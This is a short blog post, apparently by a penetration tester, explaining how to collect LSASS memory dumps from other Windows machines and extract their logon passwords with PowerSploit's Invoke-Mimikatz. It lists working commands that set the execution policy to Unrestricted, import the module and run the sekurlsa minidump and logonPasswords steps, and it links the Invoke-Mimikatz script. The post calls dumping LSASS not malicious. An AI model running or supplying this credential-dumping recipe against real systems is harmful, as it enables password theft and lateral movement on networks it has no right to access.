Came across a scenario where, was able to run powersploit on one of the machine (HOST) with antivirus.
However, wanted to crack passwords for other systems!!!
Simply get LSASS dump from other machines - Not a malicious activity!
Copy all those LSASS dump files on (HOST) and using powersploit -Command argument retrieve passwords from LSASS dump.
Executing powersploit - Invoke-Mimikatz tool to retrieve passwords from LSASS dump file.
Commands Quick Reference :
- Get-ExecutionPolicy
- Set-ExecutionPolicy Unrestricted
- Import-Module.\powersploit.psm1
- Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"'
Good references :
https://github.com/PowerShellMafia/PowerSploit
https://adsecurity.org/?page_id=1821
https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
https://www.sans.org/reading-room/whitepapers/forensics/mimikatz-overview-defenses-detection-36780
No comments:
Post a Comment